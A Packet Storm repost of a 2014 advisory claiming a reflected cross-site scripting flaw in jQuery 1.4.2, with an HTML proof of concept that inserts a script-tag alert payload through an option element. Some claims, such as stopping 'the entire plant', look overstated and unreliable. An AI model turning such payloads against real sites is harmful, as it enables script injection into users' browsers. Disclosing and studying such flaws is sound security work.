exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

JQuery 1.4.2 Cross Site Scripting

JQuery 1.4.2 Cross Site Scripting
Posted Sep 2, 2014
Authored by Mauro Risonho de Paula Assumpcao

JQuery version 1.4.2 suffers from a create object option in runtime client-side cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | 17ead7ca89da6c91771cbedd876a663573f5710a9c57d5cbdc92e3677c5d84fe

JQuery 1.4.2 Cross Site Scripting

Change Mirror Download
XSS Reflected JQuery 1.4.2 - Create object option in runtime client-side
From: Mauro Risonho de Paula Assumpção
Date: 02.09.2014 13:21:20 -0300

VSLA Security Advisory FIRE-XSS-Reflected-Jquery 1.4.2 2014-001:
XSS Reflected JQuery 1.4.2

LEVEL: MEDIUM
In our tests authorized by the customer, we can stop the entire plant.

Published: 09/01/2014
Version: 1.0

Vendor: Jquery (https://jquery.org/)
Product: Jquery 1.4.2 (
http://blog.jquery.com/2010/02/19/jquery-142-released/)
Version affected: 1.4.2

Product description:
Jquery is a open source software.
jQuery is a cross-platform JavaScript library designed to simplify the
client-side scripting of HTML(1).

Credit: Mauro Risonho de Paula Assumpção aka firebits

Finding 1: Create object option in runtime client-side and insert XSS
Reflected
‘index.html’ page, by phishing or fake site remote.

CVE: CVE-2014-? (feedback cve mitre)

Proof of Concept:
Exploit:jquery-xss-reflected.com.br.html

<!DOCTYPE html>
<! -- Mauro Risonho de Paula Assumpcao -->
<! -- aka firebits mauro.risonho@gmail.com -->
<! -- Exploit jQuery JavaScript Library v1.4.2 -->
<! -- 01.09.2014 18:07:14 SaoPaulo/Brazil -->
<! -- _____.__ ___. .__ __
-->
<! -- _/ ____\__|______ ____\_ |__ |__|/ |_ ______ -->
<! -- \ __\| \_ __ \_/ __ \| __ \| \ __\/ ___/ -->
<! -- | | | || | \/\ ___/| \_\ \ || | \___ \ -->
<! -- |__| |__||__| \___ |___ /__||__| /____ | -->
<! -- \/ \/ \/ -->
<! -- bits on fire - 1989-2014 - brazil -->
<! -- -->
<! -- * jQuery JavaScript Library v1.4.2 -->
<! -- * http://jquery.com/ -->
<! -- * -->
<! -- * Copyright 2010, John Resig -->
<! -- * Dual licensed under the MIT or GPL Version 2 licenses. -->
<! -- * http://jquery.org/license -->
<! -- * -->
<! -- * Includes Sizzle.js -->
<! -- * http://sizzlejs.com/ -->
<! -- * Copyright 2010, The Dojo Foundation
-->
<! -- * Released under the MIT, BSD, and GPL Licenses. -->
<! -- * -->
<! -- * Date: Sat Feb 13 22:33:48 2010 -0500 -->
<! -- */ -->

<html>
<head>
<meta charset="utf-8">
<title>XSS Reflected - Jquery 1.4.2 </title>
<script src="http://<target>/js/jquery.js"></script>
<script>
$(function() {
$('#users').each(function() {
var select = $(this);
var option = select.children('option').first();
select.after(option.text());
select.hide();
});
});
</script>
</head>


<body>
<form method="post">
<p>
<select id="users" name="users">
<option value="xssreflected"><script>alert(&#x27;xss
reflected - jquery 1.4.2 by - 01.09.2014 18:07:14 Sao Paulo/Brazil
@firebitsbr - mauro.risonho@gmail.com&#x27;);</script></option>
</select>
</p>
</form>
</body>
</html>


Vendor Response:
<It was not sent to the vendor, but this is sending to the MITRE CVE to
contact the vendor.> from VSLA Virtual Security Labs Anywhere.

VSLA Virtual Security Labs Anywhere recommends installing the hotfix,
hardware/software to be putting in a production environment.

Remediation Steps:
Update jquery 1.11.1

Vendor Communication Timeline:
09/01/2014 – Vulnerability disclosed
? – Confirmation to release vulnerabilities
? – Advisory published

References

1. Wikipedia http://en.wikipedia.org/wiki/JQuery
2. Jquery http://jquery.com/
3. VSLA Virtual Security Labs Anywhere https://firebitsbr.wordpress.com

About VSLA Virtual Security Labs Anywhere:
VSLA Virtual Security Labs Anywhere is a research blog on security
the information.
https://firebitsbr.wordpress.com

Disclaimer:
The information provided in this advisory is provided “as is” without
warranty of any kind. VSLA Virtual Security Labs Anywhere disclaims all
warranties, either express or implied, including the warranties of
merchantability and fitness for a particular purpose. In no event shall
VSLA Virtual Security Labs Anywhere or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
VSLA Virtual Security Labs Anywhere or its suppliers have been advised
of the possibility of such damages. Some states do not allow the
exclusion or limitation of liability for consequential or incidental
damages so the foregoing limitation may not apply.


Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    17 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close